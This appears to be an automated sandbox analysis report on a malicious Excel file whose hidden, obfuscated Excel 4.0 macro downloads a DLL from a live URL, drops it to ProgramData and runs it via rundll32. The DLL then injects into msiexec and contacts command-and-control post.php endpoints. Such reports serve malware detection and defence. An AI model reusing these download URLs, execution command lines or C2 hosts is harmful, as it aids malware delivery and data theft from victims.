Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.30497.14031

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.30497.14031 (renamed file extension from 14031 to xls)
Analysis ID:344767
MD5:26f124898bf4a54f4c110bb58b3f38c4
SHA1:a3eaad9a0cb49e8e12678c9e82d93e53d7d38008
SHA256:989e829731d55da1c9f0afdcebd1de9df19bfa1ff8935cee7b0eb8f1b5378fc5

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to inject code into remote processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found malicious URLs in unpacked macro 4.0 sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the product ID of Windows
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2480 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2484 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • msiexec.exe (PID: 2692 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Heur.30497.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1464, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 2480

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: 4.2.msiexec.exe.90000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
    Source: 3.2.rundll32.exe.970000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.158.184:443 -> 192.168.2.22:49168 version: TLS 1.2
    Binary contains paths to debug symbolsShow sources
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000004.00000003.2159256851.00000000022C0000.00000004.00000001.sdmp, scfrd[1].dll.0.dr

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: scfrd[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then push 00000000h
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 0000000Ah
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov eax, dword ptr [edi-08h]
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then add esi, 02h
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then push 00000000h
    Source: global trafficDNS query: name: rnollg.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443

    Networking:

    barindex
    Found malicious URLs in unpacked macro 4.0 sheetShow sources
    Source: before.1.0.0.sheet.csv_unpackMacro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00091AF0 InternetReadFile,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com,. equals www.linkedin.com (Linkedin)
    Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: rnollg.com
    Source: msiexec.exe, 00000004.00000003.2163545510.000000000076F000.00000004.00000001.sdmpString found in binary or memory: Https://homesoapmolds.com/post.php
    Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert
    Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
    Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
    Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
    Source: msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
    Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: msiexec.exe, 00000004.00000002.2355484698.0000000001ED0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: D0EE0000.0.drString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
    Source: SecuriteInfo.com.Heur.30497.xlsString found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
    Source: msiexec.exe, 00000004.00000002.2355484698.0000000001ED0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
    Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: msiexec.exe, 00000004.00000002.2355361210.0000000000732000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/
    Source: msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.php
    Source: msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmpString found in binary or memory: https://gadgetswolf.com/post.phpF/
    Source: msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmpString found in binary or memory: https://govemedico.tk/
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: https://govemedico.tk/post.php
    Source: msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmpString found in binary or memory: https://govemedico.tk/t
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: https://homesoapmolds.com/
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: https://homesoapmolds.com/post.php
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: https://homesoapmolds.com/post.phpx
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
    Source: before.1.0.0.sheet.csv_unpackString found in binary or memory: https://rnollg.com/kev/scfrd.dll
    Source: SecuriteInfo.com.Heur.30497.xls, D0EE0000.0.drString found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
    Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: unknownHTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49167 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.158.184:443 -> 192.168.2.22:49168 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: SecuriteInfo.com.Heur.30497.xlsInitial sample: URLDownloadToFileA
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X E14 - "" jR V \ A B C D E F G H I J K L M N O P Q R S T 1 ' Cjdigicert' 3
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: SecuriteInfo.com.Heur.30497.xlsInitial sample: CALL
    Source: SecuriteInfo.com.Heur.30497.xlsInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: SecuriteInfo.com.Heur.30497.xlsInitial sample: Sheet size: 503434
    Found obfuscated Excel 4.0 MacroShow sources
    Source: SecuriteInfo.com.Heur.30497.xlsInitial sample: High usage of CHAR() function: 147
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76E20000 page execute and read and write
    Source: C:\Windows\SysWOW64\msiexec.exeMemory allocated: 76D20000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00979C60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00973A30
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0098DA70
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00979A60
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00985BF0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A3F8FD
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A3D806
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A3D2C4
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A3BB6E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A3DD48
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00099C60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00093A30
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00099A60
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_000ADA70
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_000A5BF0
    Source: Joe Sandbox ViewDropped File: C:\ProgramData\formnet.dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
    Source: suicy.dll.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal100.expl.evad.winXLS@7/12@4/4
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_000A9C90 AdjustTokenPrivileges,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009869A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\D0EE0000Jump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD2B9.tmpJump to behavior
    Source: SecuriteInfo.com.Heur.30497.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000004.00000003.2159256851.00000000022C0000.00000004.00000001.sdmp, scfrd[1].dll.0.dr
    Source: SecuriteInfo.com.Heur.30497.xlsInitial sample: OLE summary lastprinted = 2021-01-26 16:17:13
    Source: SecuriteInfo.com.Heur.30497.xlsInitial sample: OLE indicators vbamacros = False
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0097D830 LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0099E9FA push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0099D1F2 push dword ptr [ecx]; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_009982EB push eax; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00999A5D push ebp; iretd
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0099EA51 push esi; retf
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A393ED push ecx; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0099B56F push esp; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0099B700 push ss; ret
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A52B73 push esi; ret
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Ida\suicy.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
